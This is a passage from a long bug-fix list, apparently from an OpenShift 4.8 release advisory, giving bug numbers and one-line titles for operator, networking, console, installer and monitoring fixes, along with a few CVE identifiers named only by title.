exponentially on when deleting openstack-cinder-csi-driver-node pods\n1952214 - Console Devfile Import Dev Preview broken\n1952238 - Catalog pods don\u0027t report termination logs to catalog-operator\n1952262 - Need support external gateway via hybrid overlay\n1952266 - etcd operator bumps status.version[name=operator] before operands update\n1952268 - etcd operator should not set Degraded=True EtcdMembersDegraded on healthy machine-config node reboots\n1952282 - CSR approver races with nodelink controller and does not requeue\n1952310 - VM cannot start up if the ssh key is added by another template\n1952325 - [e2e][automation] Check support modal in ssh tests and skip template parentSupport\n1952333 - openshift/kubernetes vulnerable to CVE-2021-3121\n1952358 - Openshift-apiserver CO unavailable in fresh OCP 4.7.5 installations\n1952367 - No VM status on overview page when VM is pending\n1952368 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc\n1952372 - VM stop action should not be there if the VM is not running\n1952405 - console-operator is not reporting correct Available status\n1952448 - Switch from Managed to Disabled mode: no IP removed from configuration and no container metal3-static-ip-manager stopped\n1952460 - In k8s 1.21 bump \u0027[sig-network] Firewall rule control plane should not expose well-known ports\u0027 test is disabled\n1952473 - Monitor pod placement during upgrades\n1952487 - Template filter does not work properly\n1952495 - \u201cCreate\u201d button on the Templates page is confuse\n1952527 - [Multus] multi-networkpolicy does wrong filtering\n1952545 - Selection issue when inserting YAML snippets\n1952585 - Operator links for \u0027repository\u0027 and \u0027container image\u0027 should be clickable in OperatorHub\n1952604 - Incorrect port in external loadbalancer config\n1952610 - [aws] image-registry panics when the cluster is installed in a new region\n1952611 - Tracking bug for OCPCLOUD-1115 - support user-defined tags on AWS EC2 Instances\n1952618 - 4.7.4-\u003e4.7.8 Upgrade Caused OpenShift-Apiserver Outage\n1952625 - Fix translator-reported text issues\n1952632 - 4.8 installer should default ClusterVersion channel to stable-4.8\n1952635 - Web console displays a blank page- white space instead of cluster information\n1952665 - [Multus] multi-networkpolicy pod continue restart due to OOM (out of memory)\n1952666 - Implement Enhancement 741 for Kubelet\n1952667 - Update Readme for cluster-baremetal-operator with details about the operator\n1952684 - cluster-etcd-operator: metrics controller panics on invalid response from client\n1952728 - It was not clear for users why Snapshot feature was not available\n1952730 - \u201cCustomize virtual machine\u201d and the \u201cAdvanced\u201d feature are confusing in wizard\n1952732 - Users did not understand the boot source labels\n1952741 - Monitoring DB: after set Time Range as Custom time range, no data display\n1952744 - PrometheusDuplicateTimestamps with user workload monitoring enabled\n1952759 - [RFE]It was not immediately clear what the Star icon meant\n1952795 - cloud-network-config-controller CRD does not specify correct plural name\n1952819 - failed to configure pod interface: error while waiting on flows for pod: timed out waiting for OVS flows\n1952820 - [LSO] Delete localvolume pv is failed\n1952832 - [IBM][ROKS] Enable the Web console UI to deploy OCS in External mode on IBM Cloud\n1952891 - Upgrade failed due to cinder csi driver not deployed\n1952904 - Linting issues in gather/clusterconfig package\n1952906 - Unit tests for configobserver.go\n1952931 - CI does not check leftover PVs\n1952958 - Runtime error loading console in Safari 13\n1953019 - [Installer][baremetal][metal3] The baremetal IPI installer fails on delete cluster with: failed to clean baremetal bootstrap storage pool\n1953035 - Installer should error out if publish: Internal is set while deploying OCP cluster on any on-prem platform\n1953041 - openshift-authentication-operator uses 3.9k% of its requested CPU\n1953077 - Handling GCP\u0027s: Error 400: Permission accesscontextmanager.accessLevels.list is not valid for this resource\n1953102 - kubelet CPU use during an e2e run increased 25% after rebase\n1953105 - RHCOS system components registered a 3.5x increase in CPU use over an e2e run before and after 4/9\n1953169 - endpoint slice controller doesn\u0027t handle services target port correctly\n1953257 - Multiple EgressIPs per node for one namespace when \"oc get hostsubnet\"\n1953280 - DaemonSet/node-resolver is not recreated by dns operator after deleting it\n1953291 - cluster-etcd-operator: peer cert DNS SAN is populated incorrectly\n1953418 - [e2e][automation] Fix vm wizard validate tests\n1953518 - thanos-ruler pods failed to start up for \"cannot unmarshal DNS message\"\n1953530 - Fix openshift/sdn unit test flake\n1953539 - kube-storage-version-migrator: priorityClassName not set\n1953543 - (release-4.8) Add missing sample archive data\n1953551 - build failure: unexpected trampoline for shared or dynamic linking\n1953555 - GlusterFS tests fail on ipv6 clusters\n1953647 - prometheus-adapter should have a PodDisruptionBudget in HA topology\n1953670 - ironic container image build failing because esp partition size is too small\n1953680 - ipBlock ignoring all other cidr\u0027s apart from the last one specified\n1953691 - Remove unused mock\n1953703 - Inconsistent usage of Tech preview badge in OCS plugin of OCP Console\n1953726 - Fix issues related to loading dynamic plugins\n1953729 - e2e unidling test is flaking heavily on SNO jobs\n1953795 - Ironic can\u0027t virtual media attach ISOs sourced from ingress routes\n1953798 - GCP e2e (parallel and upgrade) regularly trigger KubeAPIErrorBudgetBurn alert, also happens on AWS\n1953803 - [AWS] Installer should do pre-check to ensure user-provided private hosted zone name is valid for OCP cluster\n1953810 - Allow use of storage policy in VMC environments\n1953830 - The oc-compliance build does not available for OCP4.8\n1953846 - SystemMemoryExceedsReservation alert should consider hugepage reservation\n1953977 - [4.8] packageserver pods restart many times on the SNO cluster\n1953979 - Ironic caching virtualmedia images results in disk space limitations\n1954003 - Alerts shouldn\u0027t report any alerts in firing or pending state: openstack-cinder-csi-driver-controller-metrics TargetDown\n1954025 - Disk errors while scaling up a node with multipathing enabled\n1954087 - Unit tests for kube-scheduler-operator\n1954095 - Apply user defined tags in AWS Internal Registry\n1954105 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns\n1954124 - oc set volume not adding storageclass to pvc which leads to issues using snapshots\n1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js\n1954177 - machine-api: admissionReviewVersions v1beta1 is going to be removed in 1.22\n1954187 - multus: admissionReviewVersions v1beta1 is going to be removed in 1.22\n1954248 - Disable Alertmanager Protractor e2e tests\n1954317 - [assisted operator] Environment variables set in the subscription not being inherited by the assisted-service container\n1954330 - NetworkPolicy: allow-from-router with label policy-group.network.openshift.io/ingress: \"\" does not work on a upgraded cluster\n1954421 - Get \u0027Application is not available\u0027 when access Prometheus UI\n1954459 - Error: Gateway Time-out display on Alerting console\n1954460 - UI, The status of \"Used Capacity Breakdown [Pods]\"  is \"Not available\"\n1954509 - FC volume is marked as unmounted after failed reconstruction\n1954540 - Lack translation for local language on pages under storage menu\n1954544 - authn operator: endpoints controller should use the context it creates\n1954554 - Add e2e tests for auto node sizing\n1954566 - Cannot update a component (`UtilizationCard`) error when switching perspectives manually\n1954597 - Default image for GCP does not support ignition V3\n1954615 - Undiagnosed panic detected in pod: pods/openshift-cloud-credential-operator_cloud-credential-operator\n1954634 - apirequestcounts does not honor max users\n1954638 - apirequestcounts should indicate removedinrelease of empty instead of 2.0\n1954640 - Support of gatherers with different periods\n1954671 - disable volume expansion support in vsphere csi driver storage class\n1954687 - localvolumediscovery and localvolumset e2es are disabled\n1954688 - LSO has missing examples for localvolumesets\n1954696 - [API-1009] apirequestcounts should indicate useragent\n1954715 - Imagestream imports become very slow when doing many in parallel\n1954755 - Multus configuration should allow for net-attach-defs referenced in the openshift-multus namespace\n1954765 - CCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1954768 - baremetal-operator: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1954770 - Backport upstream fix for Kubelet getting stuck in DiskPressure\n1954773 - OVN: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert\n1954783 - [aws] support byo private hosted zone\n1954790 - KCM Alert PodDisruptionBudget At and Limit do not alert with maxUnavailable or MinAvailable by percentage\n1954830 - verify-client-go job is failing for release-4.7 branch\n1954865 - Add necessary priority class to pod-identity-webhook deployment\n1954866 - Add necessary priority class to downloads\n1954870 - Add necessary priority class to network components\n1954873 - dns server may not be specified for clusters with more than 2 dns servers specified by  openstack. \n1954891 - Add necessary priority class to pruner\n1954892 - Add necessary priority class to ingress-canary\n1954931 - (release-4.8) Remove legacy URL anonymization in the ClusterOperator related resources\n1954937 - [API-1009] `oc get apirequestcount` shows blank for column REQUESTSINCURRENTHOUR\n1954959 - unwanted decorator shown for revisions in topology though should only be shown only for knative services\n1954972 - TechPreviewNoUpgrade featureset can be undone\n1954973 - \"read /proc/pressure/cpu: operation not supported\" in node-exporter logs\n1954994 - should update to 2.26.0 for prometheus resources label\n1955051 - metrics \"kube_node_status_capacity_cpu_cores\" does not exist\n1955089 - Support [sig-cli] oc observe works as expected test for IPv6\n1955100 - Samples: APIRemovedInNextReleaseInUse info alerts display\n1955102 - Add vsphere_node_hw_version_total metric to the collected metrics\n1955114 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM\n1955196 - linuxptp-daemon crash on 4.8\n1955226 - operator updates apirequestcount CRD over and over\n1955229 - release-openshift-origin-installer-e2e-aws-calico-4.7 is permfailing\n1955256 - stop collecting API that no longer exists\n1955324 - Kubernetes Autoscaler should use Go 1.16 for testing scripts\n1955336 - Failure to Install OpenShift on GCP due to Cluster Name being similar to / contains \"google\"\n1955414 - 4.8 -\u003e 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator\n1955445 - Drop crio image metrics with high cardinality\n1955457 - Drop container_memory_failures_total metric because of high cardinality\n1955467 - Disable collection of node_mountstats_nfs metrics in node_exporter\n1955474 - [aws-ebs-csi-driver] rebase from version v1.0.0\n1955478 - Drop high-cardinality metrics from kube-state-metrics which aren\u0027t used\n1955517 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation\n1955548 - [IPI][OSP] OCP 4.6/4.7 IPI with kuryr exceeds defined serviceNetwork range\n1955554 - MAO does not react to events triggered from Validating Webhook Configurations\n1955589 - thanos-querier should have a PodDisruptionBudget in HA topology\n1955595 - Add DevPreviewLongLifecycle Descheduler profile\n1955596 - Pods stuck in creation phase on realtime kernel SNO\n1955610 - release-openshift-origin-installer-old-rhcos-e2e-aws-4.7 is permfailing\n1955622 - 4.8-e2e-metal-assisted jobs: Timeout of 360 seconds expired waiting for Cluster to be in status [\u0027installing\u0027, \u0027error\u0027]\n1955701 - [4.8] RHCOS boot image bump for RHEL 8.4 Beta\n1955749 - OCP branded templates need to be translated\n1955761 - packageserver clusteroperator does not set reason or message for Available condition\n1955783 - NetworkPolicy: ACL audit log message for allow-from-router policy should also include the namespace to distinguish between two policies similarly named configured in respective namespaces\n1955803 - OperatorHub - console accepts any value for \"Infrastructure features\" annotation\n1955822 - CIS Benchmark 5.4.1 Fails on ROKS 4: Prefer using secrets as files over secrets as environment variables\n1955854 - Ingress clusteroperator reports Degraded=True/Available=False if any ingresscontroller is degraded or unavailable\n1955862 - Local Storage Operator using LocalVolume CR fails to create PV\u0027s when backend storage failure is simulated\n1955874 - Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct\n1955879 - Customer tags cannot be seen in S3 level when set spec.managementState from Managed-\u003e Removed-\u003e Managed in configs.imageregistry with high ratio\n1955969 - Workers cannot be deployed attached to multiple networks. \n1956079 - Installer gather doesn\u0027t collect any networking information\n1956208 - Installer should validate root volume type\n1956220 - Set htt proxy system properties as expected by kubernetes-client\n1956281 - Disconnected installs are failing with kubelet trying to pause image from the internet\n1956334 - Event Listener Details page does not show Triggers section\n1956353 - test: analyze job consistently fails\n1956372 - openshift-gcp-routes causes disruption during upgrade by stopping before all pods terminate\n1956405 - Bump k8s dependencies in cluster resource override admission operator\n1956411 - Apply custom tags to AWS EBS volumes\n1956480 - [4.8] Bootimage bump tracker\n1956606 - probes FlowSchema manifest not included in any cluster profile\n1956607 - Multiple manifests lack cluster profile annotations\n1956609 - [cluster-machine-approver] CSRs for replacement control plane nodes not approved after restore from backup\n1956610 - manage-helm-repos manifest lacks cluster profile annotations\n1956611 - OLM CRD schema validation failing against CRs where the value of a string field is a blank string\n1956650 - The container disk URL is empty for Windows guest tools\n1956768 - aws-ebs-csi-driver-controller-metrics TargetDown\n1956826 - buildArgs does not work when the value is taken from a secret\n1956895 - Fix chatty kubelet log message\n1956898 - fix log files being overwritten on container state loss\n1956920 - can\u0027t open terminal for pods that have more than one container running\n1956959 - ipv6 disconnected sno crd deployment hive reports success status and clusterdeployrmet reporting false\n1956978 - Installer gather doesn\u0027t include pod names in filename\n1957039 - Physical VIP for pod -\u003e Svc -\u003e Host is incorrectly set to an IP of 169.254.169.2 for Local GW\n1957041 - Update CI e2echart with more node info\n1957127 - Delegated authentication: reduce the number of watch requests\n1957131 - Conformance tests for OpenStack require the Cinder client that is not included in the \"tests\" image\n1957146 - Only run test/extended/router/idle tests on OpenshiftSDN or OVNKubernetes\n1957149 - CI: \"Managed cluster should start all core operators\" fails with: OpenStackCinderDriverStaticResourcesControllerDegraded: \"volumesnapshotclass.yaml\" (string): missing dynamicClient\n1957179 - Incorrect VERSION in node_exporter\n1957190 - CI jobs failing due too many watch requests (prometheus-operator)\n1957198 - Misspelled console-operator condition\n1957227 - Issue replacing the EnvVariables using the unsupported ConfigMap\n1957260 - [4.8] [gcp] Installer is missing new region/zone europe-central2\n1957261 - update godoc for new build status image change trigger fields\n1957295 - Apply priority classes conventions as test to openshift/origin repo\n1957315 - kuryr-controller doesn\u0027t indicate being out of quota\n1957349 - [Azure] Machine object showing Failed phase even node is ready and VM is running properly\n1957374 - mcddrainerr doesn\u0027t list specific pod\n1957386 - Config serve and validate command should be under alpha\n1957446 - prepare CCO for future without v1beta1 CustomResourceDefinitions\n1957502 - Infrequent panic in kube-apiserver in aws-serial job\n1957561 - lack of pseudolocalization for some text on Cluster Setting page\n1957584 - Routes are not getting created  when using hostname  without FQDN standard\n1957597 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone\n1957645 - Event \"Updated PrometheusRule.monitoring.coreos.com/v1 because it changed\" is frequently looped with weird empty {} changes\n1957708 - e2e-metal-ipi and related jobs fail to bootstrap due to multiple VIP\u0027s\n1957726 - Pod stuck in ContainerCreating - Failed to start transient scope unit: Connection timed out\n1957748 - Ptp operator pod should have CPU and memory requests set but not limits\n1957756 - Device Replacemet UI, The status of the disk is \"replacement ready\" before I clicked on \"start replacement\"\n1957772 - ptp daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent\n1957775 - CVO creating cloud-controller-manager too early causing upgrade failures\n1957809 - [OSP] Install with invalid platform.openstack.machinesSubnet results in runtime error\n1957822 - Update apiserver tlsSecurityProfile description to include Custom profile\n1957832 - CMO end-to-end tests work only on AWS\n1957856 - \u0027resource name may not be empty\u0027 is shown in CI testing\n1957869 - baremetal IPI power_interface for irmc is inconsistent\n1957879 - cloud-controller-manage ClusterOperator manifest does not declare relatedObjects\n1957889 - Incomprehensible documentation of the GatherClusterOperatorPodsAndEvents gatherer\n1957893 - ClusterDeployment / Agent conditions show \"ClusterAlreadyInstalling\" during each spoke install\n1957895 - Cypress helper projectDropdown.shouldContain is not an assertion\n1957908 - Many e2e failed requests caused by kube-storage-version-migrator-operator\u0027s version reads\n1957926 - \"Add Capacity\" should allow to add n*3 (or n*4) local devices at once\n1957951 - [aws] destroy can get blocked on instances stuck in shutting-down state\n1957967 - Possible test flake in listPage Cypress view\n1957972 - Leftover templates from mdns\n1957976 - Ironic execute_deploy_steps command to ramdisk times out, resulting in a failed deployment in 4.7\n1957982 - Deployment Actions clickable for view-only projects\n1957991 - ClusterOperatorDegraded can fire during installation\n1958015 - \"config-reloader-cpu\" and \"config-reloader-memory\" flags have been deprecated for prometheus-operator\n1958080 - Missing i18n for login, error and selectprovider pages\n1958094 - Audit log files are corrupted sometimes\n1958097 - don\u0027t show \"old, insecure token format\" if the token does not actually exist\n1958114 - Ignore staged vendor files in pre-commit script\n1958126 - [OVN]Egressip doesn\u0027t take effect\n1958158 - OAuth proxy container for AlertManager and Thanos are flooding the logs\n1958216 - ocp libvirt: dnsmasq options in install config should allow duplicate option names\n1958245 - cluster-etcd-operator: static pod revision is not visible from etcd logs\n1958285 - Deployment considered unhealthy despite being available and at latest generation\n1958296 - OLM must explicitly alert on deprecated APIs in use\n1958329 - pick 97428: add more context to log after a request times out\n1958367 - Build metrics do not aggregate totals by build strategy\n1958391 - Update MCO KubeletConfig to mixin the API Server TLS Security Profile Singleton\n1958405 - etcd: current health checks and reporting are not adequate to ensure availability\n1958406 - Twistlock flags mode of /var/run/crio/crio.sock\n1958420 - openshift-install 4.7.10 fails with segmentation error\n1958424 - aws: support more auth options in manual mode\n1958439 - Install/Upgrade button on Install/Upgrade Helm Chart page does not work with Form View\n1958492 - CCO: pod-identity-webhook still accesses APIRemovedInNextReleaseInUse\n1958643 - All pods creation stuck due to SR-IOV webhook timeout\n1958679 - Compression on pool can\u0027t be disabled via UI\n1958753 - VMI nic tab is not loadable\n1958759 - Pulling Insights report is missing retry logic\n1958811 - VM creation fails on API version mismatch\n1958812 - Cluster upgrade halts as machine-config-daemon fails to parse `rpm-ostree status` during cluster upgrades\n1958861 - [CCO] pod-identity-webhook certificate request failed\n1958868 - ssh copy is missing when vm is running\n1958884 - Confusing error message when volume AZ not found\n1958913 - \"Replacing an unhealthy etcd member whose node is not ready\" procedure results in new etcd pod in CrashLoopBackOff\n1958930 - network config in machine configs prevents addition of new nodes with static networking via kargs\n1958958 - [SCALE] segfault with ovnkube adding to address set\n1958972 - [SCALE] deadlock in ovn-kube when scaling up to 300 nodes\n1959041 - LSO Cluster UI,\"Troubleshoot\" link does not exist after scale down osd pod\n1959058 - ovn-kubernetes has lock contention on the LSP cache\n1959158 - packageserver clusteroperator Available condition set to false on any Deployment spec change\n1959177 - Descheduler dev manifests are missing permissions\n1959190 - Set LABEL io.openshift.release.operator=true for driver-toolkit image addition to payload\n1959194 - Ingress controller should use minReadySeconds because otherwise it is disrupted during deployment updates\n1959278 - Should remove prometheus servicemonitor from openshift-user-workload-monitoring\n1959294 - openshift-operator-lifecycle-manager:olm-operator-serviceaccount should not rely on external networking for health check\n1959327 - Degraded nodes on upgrade - Cleaning bootversions: Read-only file system\n1959406 - Difficult to debug performance on ovn-k without pprof enabled\n1959471 - Kube sysctl conformance tests are disabled, meaning we can\u0027t submit conformance results\n1959479 - machines doesn\u0027t support dual-stack loadbalancers on Azure\n1959513 - Cluster-kube-apiserver does not use library-go for audit pkg\n1959519 - Operand details page only renders one status donut no matter how many \u0027podStatuses\u0027 descriptors are used\n1959550 - Overly generic CSS rules for dd and dt elements breaks styling elsewhere in console\n1959564 - Test verify /run filesystem contents failing\n1959648 - oc adm top --help indicates that oc adm top can display storage usage while it cannot\n1959650 - Gather SDI-related MachineConfigs\n1959658 - showing a lot \"constructing many client instances from the same exec auth config\"\n1959696 - Deprecate \u0027ConsoleConfigRoute\u0027 struct in console-operator config\n1959699 - [RFE] Collect LSO pod log and daemonset log managed by LSO\n1959703 - Bootstrap gather gets into an infinite loop on bootstrap-in-place mode\n1959711 - Egressnetworkpolicy  doesn\u0027t work when configure the EgressIP\n1959786 - [dualstack]EgressIP doesn\u0027t work on dualstack cluster for IPv6\n1959916 - Console not works well against a proxy in front of openshift clusters\n1959920 - UEFISecureBoot set not on the right master node\n1959981 - [OCPonRHV] - Affinity Group should not create by default if we define empty affinityGroupsNames: []\n1960035 - iptables is missing from ose-keepalived-ipfailover image\n1960059 - Remove \"Grafana UI\" link from Console Monitoring \u003e Dashboards page\n1960089 - ImageStreams list page, detail page and breadcrumb are not following CamelCase conventions\n1960129 - [e2e][automation] add smoke tests about VM pages and actions\n1960134 - some origin images are not public\n1960171 - Enable SNO checks for image-registry\n1960176 - CCO should recreate a user for the component when it was removed from the cloud providers\n1960205 - The kubelet log flooded with reconcileState message once CPU manager enabled\n1960255 - fixed obfuscation permissions\n1960257 - breaking changes in pr template\n1960284 - ExternalTrafficPolicy Local does not preserve connections correctly on shutdown, policy Cluster has significant performance cost\n1960323 - Address issues raised by coverity security scan\n1960324 - manifests: extra \"spec.version\" in console quickstarts makes CVO hotloop\n1960330 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960334 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960337 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960339 - manifests: unset \"preemptionPolicy\" makes CVO hotloop\n1960531 - Items under \u0027Current Bandwidth\u0027 for Dashboard \u0027Kubernetes / Networking / Pod\u0027 keep added for every access\n1960534 - Some graphs of console dashboards have no legend and tooltips are difficult to undstand compared with grafana\n1960546 - Add virt_platform metric to the collected metrics\n1960554 - Remove rbacv1beta1 handling code\n1960612 - Node disk info in overview/details does not account for second drive where /var is located\n1960619 - Image registry integration tests use old-style OAuth tokens\n1960683 - GlobalConfigPage is constantly requesting resources\n1960711 - Enabling IPsec runtime causing incorrect MTU on Pod interfaces\n1960716 - Missing details for debugging\n1960732 - Outdated manifests directory in CSI driver operator repositories\n1960757 - [OVN] hostnetwork pod can access MCS port 22623 or 22624 on master\n1960758 - oc debug / oc adm must-gather do not require openshift/tools and openshift/must-gather to be \"the newest\"\n1960767 - /metrics endpoint of the Grafana UI is accessible without authentication\n1960780 - CI: failed to create PDB \"service-test\" the server could not find the requested resource\n1961064 - Documentation link to network policies is outdated\n1961067 - Improve log gathering logic\n1961081 - policy/v1beta1 PodDisruptionBudget is deprecated in v1.21+, unavailable in v1.25+; use policy/v1 PodDisruptionBudget in CMO logs\n1961091 - Gather MachineHealthCheck definitions\n1961120 - CSI driver operators fail when upgrading a cluster\n1961173 - recreate existing static pod manifests instead of updating\n1961201 - [sig-network-edge] DNS should answer A and AAAA queries for a dual-stack service is constantly failing\n1961314 - Race condition in operator-registry pull retry unit tests\n1961320 - CatalogSource does not emit any metrics to indicate if it\u0027s ready or not\n1961336 - Devfile sample for BuildConfig is not defined\n1961356 - Update single quotes to double quotes in string\n1961363 - Minor string update for \" No Storage classes found in cluster, adding source is disabled.\"\n1961393 - DetailsPage does not work with group~version~kind\n1961452 - Remove \"Alertmanager UI\" link from Console Monitoring \u003e Alerting page\n1961466 - Some dropdown placeholder text on route creation page is not translated\n1961472 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true\n1961506 - NodePorts do not work on RHEL 7.9 workers (was \"4.7 -\u003e 4.8 upgrade is stuck at Ingress operator Degraded with rhel 7.9 workers\")\n1961536 - clusterdeployment without pull secret is crashing assisted service pod\n1961538 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop\n1961545 - Fixing Documentation Generation\n1961550 - HAproxy pod logs showing error \"another server named \u0027pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080\u0027 was already defined at line 326, please use distinct names\"\n1961554 - respect the shutdown-delay-duration from OpenShiftAPIServerConfig\n1961561 - The encryption controllers send lots of request to an API server\n1961582 - Build failure on s390x\n1961644 - NodeAuthenticator tests are failing in IPv6\n1961656 - driver-toolkit missing some release metadata\n1961675 - Kebab menu of taskrun contains Edit options which should not be present\n1961701 - Enhance gathering of events\n1961717 - Update runtime dependencies to Wallaby builds for bugfixes\n1961829 - Quick starts prereqs not shown when description is long\n1961852 - Excessive lock contention when adding many pods selected by the same NetworkPolicy\n1961878 - Add Sprint 199 translations\n1961897 - Remove history listener before console UI is unmounted\n1961925 - New ManagementCPUsOverride admission plugin blocks pod creation in clusters with no nodes\n1962062 - Monitoring dashboards should support default values of \"All\"\n1962074 - SNO:the pod get stuck in CreateContainerError and prompt \"failed to add conmon to systemd sandbox cgroup: dial unix /run/systemd/private: connect: resource temporarily unavailable\" after adding a performanceprofile\n1962095 - Replace gather-job image without FQDN\n1962153 - VolumeSnapshot routes are ambiguous, too generic\n1962172 - Single node CI e2e tests kubelet metrics endpoints intermittent downtime\n1962219 - NTO relies on unreliable leader-for-life implementation. \n1962256 - use RHEL8 as the vm-example\n1962261 - Monitoring components requesting more memory than they use\n1962274 - OCP on RHV installer fails to generate an install-config with only 2 hosts in RHV cluster\n1962347 - Cluster does not exist logs after successful installation\n1962392 - After upgrade from 4.5.16 to 4.6.17, customer\u0027s application is seeing re-transmits\n1962415 - duplicate zone information for in-tree PV after enabling migration\n1962429 - Cannot create windows vm because kubemacpool.io denied the request\n1962525 - [Migration] SDN migration stuck on MCO on RHV cluster\n1962569 - NetworkPolicy details page should also show Egress rules\n1962592 - Worker nodes restarting during OS installation\n1962602 - Cloud credential operator scrolls info \"unable to provide upcoming...\" on unsupported platform\n1962630 - NTO: Ship the current upstream TuneD\n1962687 - openshift-kube-storage-version-migrator pod failed due to Error: container has runAsNonRoot and image will run as root\n1962698 - Console-operator can not create resource console-public configmap in the openshift-config-managed namespace\n1962718 - CVE-2021-29622 prometheus: open redirect under the /new endpoint\n1962740 - Add documentation to Egress Router\n1962850 - [4.8] Bootimage bump tracker\n1962882 - Version pod does not set priorityClassName\n1962905 - Ramdisk ISO source defaulting to \"http\" breaks deployment on a good amount of BMCs\n1963068 - ironic container should not specify the entrypoint\n1963079 - KCM/KS: ability to enforce localhost communication with the API server. \n1963154 - Current BMAC reconcile flow skips Ironic\u0027s deprovision step\n1963159 - Add Sprint 200 translations\n1963204 - Update to 8.4 IPA images\n1963205 - Installer is using old redirector\n1963208 - Translation typos/inconsistencies for Sprint 200 files\n1963209 - Some strings in public.json have errors\n1963211 - Fix grammar issue in kubevirt-plugin.json string\n1963213 - Memsource download script running into API error\n1963219 - ImageStreamTags not internationalized\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n1963267 - Warning: Invalid DOM property `classname`. Did you mean `className`? console warnings in volumes table\n1963502 - create template from is not descriptive\n1963676 - in vm wizard when selecting an os template it looks like selecting the flavor too\n1963833 - Cluster monitoring operator crashlooping on single node clusters due to segfault\n1963848 - Use OS-shipped stalld vs. the NTO-shipped one. \n1963866 - NTO: use the latest k8s 1.21.1 and openshift vendor dependencies\n1963871 - cluster-etcd-operator:[build] upgrade to go 1.16\n1963896 - The VM disks table does not show easy links to PVCs\n1963912 - \"[sig-network] DNS should provide DNS for {services, cluster, subdomain, hostname}\" failures on vsphere\n1963932 - Installation failures in bootstrap in OpenStack release jobs\n1963964 - Characters are not escaped on config ini file causing Kuryr bootstrap to fail\n1964059 - rebase openshift/sdn to kube 1.21.1\n1964197 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration\n1964203 - e2e-metal-ipi, e2e-metal-ipi-ovn-dualstack and e2e-metal-ipi-ovn-ipv6 are failing due to \"Unknown provider baremetal\"\n1964243 - The `oc compliance fetch-raw` doesn\u2019t work for disconnected cluster\n1964270 - Failed to install \u0027cluster-kube-descheduler-operator\u0027 with error: \"clusterkubedescheduleroperator.4.8.0-202105211057.p0.assembly.stream\\\": must be no more than 63 characters\"\n1964319 - Network policy \"deny all\" interpreted as \"allow all\" in description page\n1964334 - alertmanager/prometheus/thanos-querier /metrics endpoints are not secured\n1964472 - Make project and namespace requirements more visible rather than giving me an error after submission\n1964486 - Bulk adding of CIDR IPS to whitelist is not working\n1964492 - Pick 102171: Implement support for watch initialization in P\u0026F\n1964625 - NETID duplicate check is only required in NetworkPolicy Mode\n1964748 - Sync upstream 1.7.2 downstream\n1964756 - PVC status is always in \u0027Bound\u0027 status when it is actually cloning\n1964847 - Sanity check test suite missing from the repo\n1964888 - opoenshift-apiserver imagestreamimports depend on \u003e34s timeout support, WAS: transport: loopyWriter.run returning. connection error: desc = \"transport is closing\"\n1964936 - error log for \"oc adm catalog mirror\" is not correct\n1964979 - Add mapping from ACI to infraenv to handle creation order issues\n1964997 - Helm Library charts are showing and can be installed from Catalog\n1965024 - [DR] backup and restore should perform consistency checks on etcd snapshots\n1965092 - [Assisted-4.7] [Staging][OLM] Operators deployments start before all workers finished installation\n1965283 - 4.7-\u003e4.8 upgrades: cluster operators are not ready: openshift-controller-manager (Upgradeable=Unknown NoData: ), service-ca (Upgradeable=Unknown NoData:\n1965330 - oc image extract fails due to security capabilities on files\n1965334 - opm index add fails during image extraction\n1965367 - Typo in in etcd-metric-serving-ca resource name\n1965370 - \"Route\" is not translated in Korean or Chinese\n1965391 - When storage class is already present wizard do not jumps to \"Stoarge and nodes\"\n1965422 - runc is missing Provides oci-runtime in rpm spec\n1965522 - [v2v] Multiple typos on VM Import screen\n1965545 - Pod stuck in ContainerCreating: Unit ...slice already exists\n1965909 - Replace \"Enable Taint Nodes\" by \"Mark nodes as dedicated\"\n1965921 - [oVirt] High performance VMs shouldn\u0027t be created with Existing policy\n1965929 - kube-apiserver should use cert auth when reaching out to the oauth-apiserver with a TokenReview request\n1966077 - `hidden` descriptor is visible in the Operator instance details page`\n1966116 - DNS SRV request which worked in 4.7.9 stopped working in 4.7.11\n1966126 - root_ca_cert_publisher_sync_duration_seconds metric can have an excessive cardinality\n1966138 - (release-4.8) Update K8s \u0026 OpenShift API versions\n1966156 - Issue with Internal Registry CA on the service pod\n1966174 - No storage class is installed, OCS and CNV installations fail\n1966268 - Workaround for Network Manager not supporting nmconnections priority\n1966401 - Revamp Ceph Table in Install Wizard flow\n1966410 - kube-controller-manager should not trigger APIRemovedInNextReleaseInUse alert\n1966416 - (release-4.8) Do not exceed the data size limit\n1966459 - \u0027policy/v1beta1 PodDisruptionBudget\u0027 and \u0027batch/v1beta1 CronJob\u0027 appear in image-registry-operator log\n1966487 - IP address in Pods list table are showing node IP other than pod IP\n1966520 - Add button from ocs add capacity should not be enabled if there are no PV\u0027s\n1966523 - (release-4.8) Gather MachineAutoScaler definitions\n1966546 - [master] KubeAPI - keep day1 after cluster is successfully installed\n1966561 - Workload partitioning annotation workaround needed for CSV annotation propagation bug\n1966602 - don\u0027t require manually setting IPv6DualStack feature gate in 4.8\n1966620 - The bundle.Dockerfile in the repo is obsolete\n1966632 - [4.8.0] [assisted 